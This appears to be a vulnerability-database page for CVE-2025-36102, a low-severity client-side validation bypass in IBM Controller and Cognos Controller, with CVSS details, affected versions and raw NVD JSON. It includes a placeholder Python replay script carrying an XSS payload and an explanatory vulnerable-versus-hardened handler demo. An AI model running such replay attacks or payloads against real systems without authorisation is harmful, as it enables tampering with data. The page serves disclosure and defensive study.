Security Vulnerability Report
CVE-2025-36102 CVSS 2.7 LOW

CVE-2025-36102

Published: 2025-12-08 22:15:52
Last Modified: 2025-12-10 18:14:45

Description

IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow a privileged user to bypass validation, passing user input into the application as trusted data, due to client-side enforcement of server-side security. NVD classifies the weakness as CWE-602 (Client-Side Enforcement of Server-Side Security): the application performs a validation step only in the browser, so a user who edits or replays the request skips it entirely, and the server accepts the unvalidated value as if it had been checked. The attacker must already hold a high-privilege account (PR:H), and the only rated impact is a low loss of integrity, which is why the score is 2.7.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N
Vector breakdown
Attack Vector: Network; Attack Complexity: Low; Privileges Required: High; User Interaction: None; Scope: Unchanged; Confidentiality: None; Integrity: Low; Availability: None (exploitability subscore 1.2, impact subscore 1.4)
Weakness
CWE-602 (Client-Side Enforcement of Server-Side Security)

Configurations (Affected Products)

cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 11.0.0, versionEndExcluding 11.0.1.7)
cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:* - VULNERABLE (versionStartIncluding 11.1.0, versionEndExcluding 11.1.2)
IBM Cognos Controller 11.0.0 - 11.0.1 FP6
IBM Controller 11.1.0 - 11.1.1
Check the installed build against these bounds before relying on the CPE match alone; the NVD range for Cognos Controller stops just short of 11.0.1.7, and the range for Controller stops short of 11.1.2. Consult the IBM advisory below for the remediation that applies to your release.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note what it does and does not demonstrate: neither the NVD entry nor anything else on this page publishes the affected endpoint, parameter names, or request format, so the URL, the `dataField`/`action` fields and the `bypassValidation` flag below are placeholders that must be replaced with values captured from a real session against the product. The script is only a template for the general technique: capture a request that the browser has already validated, replay it from outside the browser with a value the client-side check would have refused, and see whether the server accepts it. A 200 response by itself does not prove the bypass; the server must actually act on the unvalidated value.

```python
# CVE-2025-36102 PoC - Security Validation Bypass
# This PoC demonstrates bypassing client-side validation by replaying a request
# outside the browser, so the JavaScript validation never runs.
import requests

# Placeholders: the real endpoint and session cookie are not published on this
# page and must be taken from an authorized test environment.
TARGET_URL = "https://vulnerable-ibm-controller.example.com/api/endpoint"
SESSION_COOKIE = "your-session-cookie-here"


def exploit_cve_2025_36102():
    """
    Exploit template for CVE-2025-36102: IBM Controller client-side validation bypass.
    Requires a high-privilege authenticated user session (CVSS PR:H).
    Returns True if the server answered 200 to the unvalidated payload; confirm
    the bypass by checking that the value was actually stored or processed.
    """
    headers = {
        "Cookie": f"JSESSIONID={SESSION_COOKIE}",
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
    }

    # Step 1: The request the browser would send after its own validation passed.
    # Field names are placeholders, not parameters documented for the product.
    original_payload = {
        "dataField": "normal_value",
        "action": "submit",
    }

    # Step 2: The same request with a value the client-side check would refuse.
    # "bypassValidation" is a placeholder flag; nothing on this page documents it.
    malicious_payload = {
        "dataField": "<script>alert('xss')</script>",
        "action": "submit",
        "bypassValidation": True,
    }

    # Step 3: Send the baseline request, then the unvalidated one, and compare.
    # verify=False disables TLS verification; acceptable only in a lab.
    baseline = requests.post(TARGET_URL, headers=headers, json=original_payload, verify=False)
    response = requests.post(TARGET_URL, headers=headers, json=malicious_payload, verify=False)

    print(f"Baseline status: {baseline.status_code}")
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    return response.status_code == 200


if __name__ == "__main__":
    print("CVE-2025-36102 PoC Execution")
    print("Target: IBM Controller / IBM Cognos Controller")
    print("Vulnerability: Client-side validation bypass as server-side security")
    exploit_cve_2025_36102()
```
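The weakness class behind this CVE, CWE-602, is easier to reason about with the server side in view. The following is an added illustration written for this page; it is not IBM's code and does not reproduce the Controller endpoint. The request shape, the `dataField` rule, the `clientValidated` flag and the handler names are all invented for the demonstration. The vulnerable handler trusts a client-supplied claim that validation already ran, which is exactly the pattern an attacker bypasses by editing the request; the hardened handler re-validates on the server unconditionally. `server_enforces_validation` is the check a tester would run: replay a request with the client-side step skipped and see whether the server still rejects bad input.

```python
# Added example for CWE-602 (client-side enforcement of server-side security).
# Generic illustration, not IBM Controller code: all names and rules are assumed.
import re

# Hypothetical validation rule, assumed for the demo: an account code of
# 1-10 characters drawn from [A-Z0-9_]. The browser applies the same rule
# before submitting, which is fine as UX but must not be the only check.
ACCOUNT_CODE = re.compile(r"[A-Z0-9_]{1,10}")


def validate_data_field(value) -> bool:
    """Server-side validation rule; must run regardless of what the client claims."""
    return isinstance(value, str) and ACCOUNT_CODE.fullmatch(value) is not None


def handle_vulnerable(request: dict) -> dict:
    """CWE-602 pattern: the server skips validation when the client says it already ran.

    `clientValidated` arrives in the request body, so anyone who can edit the
    request (a proxy, curl, the browser console) sets it and bypasses the check.
    """
    value = request.get("dataField")
    if request.get("clientValidated"):
        # BUG: trusting a client-controlled flag as proof that input was checked
        return {"status": 200, "stored": value}
    if not validate_data_field(value):
        return {"status": 400, "error": "invalid dataField"}
    return {"status": 200, "stored": value}


def handle_hardened(request: dict) -> dict:
    """Fixed pattern: ignore client claims and validate every request on the server."""
    value = request.get("dataField")
    if not validate_data_field(value):
        return {"status": 400, "error": "invalid dataField"}
    return {"status": 200, "stored": value}


def server_enforces_validation(handler) -> bool:
    """Replay a request with the client-side check bypassed (constructed input).

    Returns True when the handler rejects bad input even though the request
    claims it was already validated, i.e. validation is enforced server-side.
    """
    forged = {
        "dataField": "<script>alert(1)</script>",  # would fail the browser rule
        "clientValidated": True,                   # attacker-set claim
        "action": "submit",
    }
    return handler(forged)["status"] == 400


if __name__ == "__main__":
    for name, handler in (("vulnerable", handle_vulnerable), ("hardened", handle_hardened)):
        verdict = "enforces" if server_enforces_validation(handler) else "does NOT enforce"
        print(f"{name}: server {verdict} validation")
```

Run the module directly and it reports that the vulnerable handler does not enforce validation while the hardened one does. The same replay-with-bad-input check is the honest way to confirm a suspected CWE-602 issue in a real application: the finding is only real if the server stores or acts on the value the browser would have refused.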

References

https://www.ibm.com/support/pages/node/7253273 (Vendor Advisory, IBM)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-36102",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-08T22:15:51.687",
    "lastModified": "2025-12-10T18:14:44.587",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 could allow a privileged user to bypass validation, passing user input into the application as trusted data, due to client-side enforcement of server-side security."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 2.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-602"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.0.0",
                "versionEndExcluding": "11.0.1.7",
                "matchCriteriaId": "010915B1-A0E9-4D01-8A86-3B771F2AD659"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.1.0",
                "versionEndExcluding": "11.1.2",
                "matchCriteriaId": "24C24CEC-8494-4620-9F14-22D154D85866"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7253273",
        "source": "[email protected]",
        "tags": [
          "Vendor Advisory"
        ]
      }
    ]
  }
}
```